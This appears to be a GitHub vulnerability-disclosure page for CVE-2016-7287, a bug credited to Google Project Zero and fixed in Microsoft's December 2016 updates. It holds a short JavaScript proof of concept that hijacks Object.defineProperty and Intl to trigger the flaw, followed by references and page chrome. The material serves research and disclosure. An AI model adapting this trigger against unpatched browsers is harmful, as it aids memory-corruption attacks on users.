CVE-2016-7287

Report: Oct 2016
Fix: Dec 2016
Credit: Natalie Silvanovich, Google Project Zero

PoC

var d = Object.defineProperty;

var noobj = {
  get: function () {
    return 0x1234567 >> 1;
  },
  set: function () { }
};

function f(){
  var i = Intl;
  Intl  = {}; // this somehow prevents an exception that prevents laoding
  d(i, "Collator", noobj);
}

Object.defineProperty = f;

var q = new Intl.NumberFormat(["en"]);

Reference

Microsoft (MS16-144)
Microsoft (MS16-145)
Project Zero

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2016-7287.md

CVE-2016-7287.md

CVE-2016-7287

PoC

Reference

Files

CVE-2016-7287.md

Latest commit

History

CVE-2016-7287.md

File metadata and controls

CVE-2016-7287

PoC

Reference